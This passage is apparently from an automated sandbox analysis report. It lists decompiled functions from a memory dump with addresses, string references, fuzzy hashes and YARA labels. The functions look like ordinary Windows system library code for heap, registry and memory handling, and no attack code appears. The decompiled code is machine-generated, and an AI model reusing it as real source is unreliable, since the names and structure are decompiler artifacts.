					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00ECA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00ECA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xef8b04 >> 0x14) + (_v44 -  *0xef8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00E27D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00EC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00E27D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00EBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xef8724 & 0x00000008) != 0) {
						E00EC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00ED15B5(0xef8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x00ed0eb7
0x00ed0eb9
0x00ed0ec0
0x00ed0ec2
0x00ed0ecd
0x00ed105b
0x00ed105b
0x00ed1061
0x00ed1066
0x00ed1066
0x00ed106b
0x00ed1073
0x00ed1073
0x00ed0ed3
0x00ed0ed6
0x00ed0edc
0x00ed0ee0
0x00ed0ee7
0x00ed0ef0
0x00ed0ef5
0x00ed0efa
0x00ed0efc
0x00ed0efd
0x00ed0f03
0x00ed0f04
0x00ed0f06
0x00ed0f07
0x00ed0f09
0x00ed0f0e
0x00ed0f14
0x00ed0f23
0x00ed0f2d
0x00ed0f34
0x00ed0f34
0x00ed0f14
0x00ed0f52
0x00000000
0x00000000
0x00ed0f58
0x00ed0f73
0x00ed0f74
0x00ed0f79
0x00ed0f7d
0x00ed0f80
0x00ed0f86
0x00ed0fab
0x00ed0fb5
0x00ed0fc6
0x00ed0fd1
0x00ed0fe3
0x00ed0fd3
0x00ed0fdc
0x00ed0fdc
0x00ed0feb
0x00ed1009
0x00ed1009
0x00ed1015
0x00ed1027
0x00ed1017
0x00ed1020
0x00ed1020
0x00ed102f
0x00ed103c
0x00ed103c
0x00ed1048
0x00ed1050
0x00ed1050
0x00ed1055
0x00000000
0x00ed1055
0x00ed0f88
0x00ed0f9e
0x00ed0fa2
0x00ed0fa9
0x00000000
0x00000000
0x00000000
0x00ed0fa9
0x00000000

Strings

`, xrefs: 00ED0F16

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 571227aae51eb4705a405c34be60b4761d403ac05addbcc5c8daa90a7177c909
Instruction ID: f086525ef16e66ff4c8a3e4bbfc4afb93c3e327209dd74c1606e02d76543556d
Opcode Fuzzy Hash: 571227aae51eb4705a405c34be60b4761d403ac05addbcc5c8daa90a7177c909
Instruction Fuzzy Hash: 8551DE712083419FD324EF28D981B2BB7E5EBC4304F18196EF992A7391D631E846CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E3F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00E24120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00E49830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00E49990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00E495D0();
							goto L11;
						} else {
							_t109 = L00E24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00E4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00E495D0();
										L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00e3f0d3
0x00e3f0d9
0x00e3f0e0
0x00e3f0e7
0x00e3f0f2
0x00e3f0f4
0x00e3f0f8
0x00e3f100
0x00e3f108
0x00e3f10d
0x00e3f115
0x00e3f116
0x00e3f11f
0x00e3f123
0x00e3f124
0x00e3f12c
0x00e3f130
0x00e3f134
0x00e3f13d
0x00e3f144
0x00e3f14b
0x00e3f152
0x00e7bab0
0x00e7bab0
0x00e3f158
0x00e3f158
0x00e3f15a
0x00e3f160
0x00e3f165
0x00e3f166
0x00e3f16f
0x00e3f173
0x00e7baa7
0x00e7baa7
0x00e7baab
0x00000000
0x00e3f179
0x00e3f18d
0x00e3f191
0x00e7baa2
0x00000000
0x00e3f197
0x00e3f19b
0x00e3f1a2
0x00e3f1a9
0x00e3f1af
0x00e3f1b2
0x00e3f1b6
0x00e3f1b9
0x00e3f1c4
0x00e3f1d8
0x00e3f1df
0x00e3f1e3
0x00e3f1eb
0x00e3f1ee
0x00e3f1f4
0x00e3f20f
0x00e7bab7
0x00e7babb
0x00e7bacc
0x00e7bad1
0x00e3f215
0x00e3f218
0x00e3f226
0x00e3f22b
0x00000000
0x00e3f22b
0x00e3f1f6
0x00e3f1f6
0x00e3f1f9
0x00e3f1fb
0x00e3f1fb
0x00e3f1f4
0x00e3f191
0x00e3f173
0x00e3f152
0x00e3f203

Strings

@, xrefs: 00E3F124

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 945785d5e79b4138db32fb5c50e362a0938b81856a779771dbd2e4606ad352b6
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 2851AD71504710AFC320DF28C841A6BBBF8FF48710F108A2EF995A7691E7B4E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E83540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E83540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xefd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00E40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00E83706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00E4FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00E83540;
						E00E4FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00E5DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00E90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00E497C0();
					}
					return E00E4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00E83971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00E83884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00E4FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00E49650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00E83787(_a4,  &_v352, _t80);
						}
					}
					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00E495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00e83552
0x00e8355a
0x00e8355d
0x00e83566
0x00e83567
0x00e8357e
0x00e8358f
0x00e835a1
0x00e835a5
0x00e8366b
0x00e8366b
0x00e8366d
0x00e83672
0x00e83679
0x00e83685
0x00e8368d
0x00e8369d
0x00e836a7
0x00e836b8
0x00e836c6
0x00e836c7
0x00e836dc
0x00e836e1
0x00e836e7
0x00e836e9
0x00e836e9
0x00e83703
0x00e83703
0x00e835b5
0x00e835c0
0x00e835c4
0x00000000
0x00000000
0x00e835ca
0x00e835d7
0x00e835e2
0x00e835e6
0x00e835e8
0x00e835f5
0x00e835fa
0x00e83603
0x00e83604
0x00e83609
0x00e8360a
0x00e83612
0x00e83613
0x00e8361e
0x00e83622
0x00e83628
0x00e8362f
0x00e8362f
0x00e83636
0x00e83638
0x00e8363b
0x00e83642
0x00e83642
0x00e83636
0x00e83657
0x00e83657
0x00e8365c
0x00e83662
0x00e83669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 00E8358F

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: a61822d1d0b5d918f8bb3d718fcd2848ffc67dd9791c7372642b3202e45cd0d2
Instruction ID: eb1f2d14f96f0c26ebf205156b6c00a71adf75f5ee0bb824790e6240849d63ad
Opcode Fuzzy Hash: a61822d1d0b5d918f8bb3d718fcd2848ffc67dd9791c7372642b3202e45cd0d2
Instruction Fuzzy Hash: DF4135F1D0152CAADB21EA64DC81F9EB77CAB44714F0055A5EA0DB7241EB309F888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00ED05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00ED05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00ED07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00E49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00ECA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00ECA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00ED1293(_t79, _v40, E00ED07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00E27D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00EC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x00ed05c5
0x00ed05ca
0x00ed05d3
0x00ed06db
0x00ed06db
0x00ed06dd
0x00ed06e3
0x00ed06e3
0x00ed05dd
0x00ed05e7
0x00ed05f6
0x00ed0600
0x00ed0607
0x00ed0610
0x00ed0615
0x00ed061a
0x00ed061c
0x00ed061e
0x00ed0624
0x00ed0625
0x00ed0627
0x00ed0628
0x00ed0631
0x00ed0640
0x00ed064d
0x00ed0654
0x00ed0654
0x00ed0631
0x00ed066d
0x00ed0674
0x00000000
0x00000000
0x00ed0692
0x00ed069e
0x00ed06b0
0x00ed06a0
0x00ed06a9
0x00ed06a9
0x00ed06b8
0x00ed06d6
0x00ed06d6
0x00000000

Strings

`, xrefs: 00ED0633

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 94a4e37af872c64d3114cf049c442a501b81acd7dd905c59a59221a1e74922ac
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: FC312432204305ABE720DE24CD45F9B77D9EBC4758F08522AF964AB781E770ED15C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E83884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00E49650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00E24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00E49650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x00e83893
0x00e83896
0x00e83899
0x00e8389f
0x00e838a0
0x00e838a4
0x00e838a9
0x00e838ac
0x00e838ad
0x00e838ae
0x00e838af
0x00e838b1
0x00e838b4
0x00e838bb
0x00e838bc
0x00e838bd
0x00e838c4
0x00e838c8
0x00e838ca
0x00e838ca
0x00e838d5
0x00e8393e
0x00e83940
0x00e83942
0x00e83952
0x00e83954
0x00e83961
0x00e83961
0x00e83967
0x00e8396e
0x00e8396e
0x00e83947
0x00e8394c
0x00000000
0x00e8394c
0x00e838ea
0x00e838ee
0x00e838f8
0x00e838f9
0x00e838ff
0x00e83900
0x00e83902
0x00e83903
0x00e8390b
0x00e8390f
0x00e83950
0x00000000
0x00e83950
0x00e83915
0x00e8391d
0x00e8391d
0x00e83922
0x00e83926
0x00000000
0x00e83928
0x00e8392b
0x00e8392b
0x00e83935
0x00e83937
0x00e83937
0x00000000
0x00e83935
0x00e83926
0x00e838f0
0x00000000

Strings

BinaryName, xrefs: 00E838B4

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 3cec4c1cfa9ead5be86d14f6831d3f7d08f9b143293f300eede18bf545ebe77f
Instruction ID: c875141dd54e50c0c3a398e2784a13a103c4e3220367e13e0393d936e4e832b8
Opcode Fuzzy Hash: 3cec4c1cfa9ead5be86d14f6831d3f7d08f9b143293f300eede18bf545ebe77f
Instruction Fuzzy Hash: F131013290051AAFDB19EA68C945EAFB7B4EB80B20F115169E85DB7291D7709F00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00E3D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xefd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00E24120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00E4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00E498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00E495D0();
					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x00e3d29c
0x00e3d2a6
0x00e3d2b1
0x00e3d2b5
0x00e3d2b6
0x00e3d2bc
0x00e3d2bd
0x00e3d2be
0x00e3d2bf
0x00e3d2c2
0x00e3d2c4
0x00e3d2cc
0x00e3d384
0x00e3d34b
0x00e3d34f
0x00e3d350
0x00e3d351
0x00e3d35c
0x00e3d35c
0x00e3d2d6
0x00e3d2da
0x00e3d2e1
0x00e3d361
0x00e3d369
0x00e3d36d
0x00e3d2e3
0x00e3d2e3
0x00e3d2e3
0x00e3d2e5
0x00e3d2ed
0x00e3d2f5
0x00e3d2fa
0x00e3d302
0x00e3d303
0x00e3d30b
0x00e3d30f
0x00e3d313
0x00e3d318
0x00e3d31c
0x00e3d320
0x00e3d379
0x00e3d37d
0x00000000
0x00000000
0x00e7affe
0x00e7b001
0x00e7b011
0x00000000
0x00e3d322
0x00e3d322
0x00e3d330
0x00e3d337
0x00e3d35d
0x00e3d339
0x00e3d33f
0x00e3d38c
0x00e3d38c
0x00e3d33f
0x00e3d349
0x00000000
0x00e3d349

Strings

@, xrefs: 00E3D303

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: eed75105540354d86ea6c0738470601f3c989ea08df707e6585f2a7a84cf8e68
Instruction ID: 8f509ff9c8f04a640b26d6f1167c8fad9846bc22aeef42a2c8f78e8281f4296d
Opcode Fuzzy Hash: eed75105540354d86ea6c0738470601f3c989ea08df707e6585f2a7a84cf8e68
Instruction Fuzzy Hash: 26319CB150C3059FC311DF28E885AABBFE8EB89754F10292EF994A3211D634DD08DB93

Uniqueness

Uniqueness Score: -1.00%

Function 00E11B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00E4BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00E4A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00E4A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00E24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00e11b8f
0x00e11b9a
0x00e11b9c
0x00e11b9e
0x00e11ba3
0x00e67010
0x00e67010
0x00000000
0x00e11ba9
0x00e11ba9
0x00e11bae
0x00000000
0x00e11bc5
0x00e11bca
0x00e11bcf
0x00e11bd0
0x00e11bd1
0x00e11bd2
0x00e11bd6
0x00e11bdc
0x00e11be0
0x00e66ffc
0x00e67000
0x00000000
0x00e67006
0x00e67009
0x00e67009
0x00e11be6
0x00e11bec
0x00e11c0b
0x00e11c0b
0x00e11c0c
0x00e11c11
0x00e11c12
0x00e11c15
0x00e11c1b
0x00e11c1f
0x00e11c31
0x00e11c33
0x00e67026
0x00e67026
0x00e11c21
0x00e11c24
0x00e11c24
0x00e11bee
0x00e11bee
0x00e11bf2
0x00e11c3a
0x00e11bf4
0x00e11bf4
0x00e11c05
0x00e11c05
0x00e11c09
0x00e11c3e
0x00000000
0x00000000
0x00000000
0x00e11c09
0x00e11bec
0x00e11be0
0x00e11bae
0x00e11c2e

Strings

WindowsExcludedProcs, xrefs: 00E11BC5

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 04f2d97242ad1b5bb76cfe965a66739594e89117a309327daec2033bc010de1a
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 97212536584228ABCB25DA95D844FDBB7ACEF80754F1520A5FA04BB200D630DC00D7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E2F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x00e2f71d
0x00e2f722
0x00e2f726
0x00e74770
0x00e2f765
0x00e2f769
0x00e2f769
0x00e2f732
